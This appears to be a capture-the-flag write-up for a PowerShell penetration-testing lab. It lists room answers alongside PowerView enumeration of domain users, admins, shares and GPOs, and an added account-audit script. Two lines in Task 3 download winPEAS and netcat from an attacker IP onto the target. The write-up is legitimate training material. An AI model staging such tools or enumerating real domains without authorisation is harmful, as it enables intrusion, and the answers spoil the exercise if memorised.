PowerShell for Pentesters
Those who find peace in the past...
You've got to make peace with the past if you...
...will have hope for the future.
...if you want hope for the future.
# Task 2 Manipulating files
What is the MD5 hash value of the file on Walter's desktop?
hint: Get-FileHash -Algorithm MD5 .\powerview.ps1
501570FFBA7FACE69D61DA1A0843E89A
# Task 3 Downloading files
(New-Object System.Net.WebClient).DownloadFile('http://10.6.88.227:8000/winPEASx64.exe', 'winPEASx64.exe')
Invoke-WebRequest "http://10.6.88.227:8000/nc.exe" -OutFile "netcat.exe"
# Task 4 System Reconnaissance
- What Windows Security Update was installed on 5/15/2019?
PS C:\Users\Walter\Desktop> Get-HotFix| findstr 5/15
WATCHMAN-DC Security Update KB4499728 NT AUTHORITY\SYSTEM 5/15/2019 12:00:00 AM
KB4499728
# Task 5 Network Reconnaissance
no answer
# Task 6 Using PowerView
- One of the accounts has a special description; what is it?
hint: Get-NetUser -Properties description
IDF-17828290
- How many accounts are disabled?
hint: Get-NetUser -Properties useraccountcontrol
Get-NetUser -Properties useraccountcontrol | findstr ACCOUNTDISABLE
Get-NetUser -Properties useraccountcontrol | findstr ACCOUNTDISABLE | measure
- How many users are in the "domain admins" group?
hint: Get-NetGroupMember "domain admins"
or Get-NetGroupMember "domain admins" | findstr MemberName
or Get-NetGroupMember "domain admins" | measure
Count : 3
Average :
Sum :
Maximum :
Minimum :
Property :
3
- Which users are in the "domain admins" group? (Listed alphabetically, small, comma-separated, using space)
hint: Get-NetGroupMember "domain admins"| Sort-Object membername|Format-Table membername
MemberName
----------
ServerAdmin
ssilk
usand
ServerAdmin,ssilk,usand
- List shares; what is the name of the "interesting" share?
hint: Find-DomainShare
or Find-DomainShare -CheckShareAccess
Name Type Remark ComputerName
---- ---- ------ ------------
ADMIN$ 2147483648 Remote Admin WATCHMAN-DC.WATCH.local
C$ 2147483648 Default share WATCHMAN-DC.WATCH.local
NETLOGON 0 Logon server share WATCHMAN-DC.WATCH.local
operationfiles 0 WATCHMAN-DC.WATCH.local
SYSVOL 0 Logon server share WATCHMAN-DC.WATCH.local
Get-NetGPO | findstr displayname
displayname : Default Domain Policy
displayname : Default Domain Controllers Policy
displayname : Disable WinDef
or PS C:\Users\Walter\Desktop> Get-NetGPO -Properties displayname
displayname
-----------
Default Domain Policy
Default Domain Controllers Policy
Disable WinDef
- What are the first names of users whose accounts were disabled? (Sorted alphabetically, small, comma-separated, using space)
hint: Get-NetUser | Sort-Object displayname | Where-Object -Property useraccountcontrol -Match ACCOUNTDISABLE | Format-Table displayname
Daniel Triberg
Ursula Sand
Daniel, Ursula
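The Task 6 checks above pipe PowerView's text output through findstr, which breaks as soon as the formatting changes. The script below is an added example (not from the room, PowerView or this writeup) that answers the same questions by decoding the userAccountControl bit flags directly with the built-in ADSI searcher; the LDAP filter and attribute names are standard, and it is assumed to run as a domain user on a domain-joined host.

```powershell
# Added example, not from the room or this writeup: reproduce the Task 6 checks
# (disabled accounts, accounts with a description) by decoding the
# userAccountControl bit flags instead of string-matching PowerView's output.
# Uses only the built-in ADSI searcher; assumes a domain-joined host.
$UAC_ACCOUNTDISABLE       = 0x0002
$UAC_DONT_EXPIRE_PASSWORD = 0x10000

function Get-LdapValue {
    # First value of an LDAP attribute, or '' when the attribute is absent
    param($Result, [string]$Name)
    $v = $Result.Properties[$Name]
    if ($v -and $v.Count -gt 0) { return [string]$v[0] }
    return ''
}

function Get-UserAccountAudit {
    param([string]$Filter = '(&(objectCategory=person)(objectClass=user))')
    $searcher = [adsisearcher]$Filter
    $searcher.PageSize = 500   # paged search so results are not cut off at 1000
    foreach ($p in 'samaccountname', 'givenname', 'useraccountcontrol', 'description') {
        [void]$searcher.PropertiesToLoad.Add($p)
    }
    foreach ($r in $searcher.FindAll()) {
        $uac = [int](Get-LdapValue $r 'useraccountcontrol')
        [pscustomobject]@{
            SamAccountName       = Get-LdapValue $r 'samaccountname'
            FirstName            = Get-LdapValue $r 'givenname'
            Disabled             = [bool]($uac -band $UAC_ACCOUNTDISABLE)
            PasswordNeverExpires = [bool]($uac -band $UAC_DONT_EXPIRE_PASSWORD)
            Description          = Get-LdapValue $r 'description'
        }
    }
}

$audit = Get-UserAccountAudit

# Disabled accounts: count and first names sorted alphabetically (Task 6)
$disabled = $audit | Where-Object Disabled | Sort-Object FirstName
"Disabled accounts: $($disabled.Count)"
($disabled.FirstName | Where-Object { $_ }) -join ', '

# Accounts with a non-empty description, where stray identifiers tend to end up
$audit | Where-Object Description | Format-Table SamAccountName, Description -AutoSize
```

Because the flag test is a bitwise AND on the integer attribute, it keeps working when PowerView is unavailable or prints the flags in a different order.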
https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview
https://hamdisevben.medium.com/tryhackme-powershell-for-pentesters-b31a3036ec2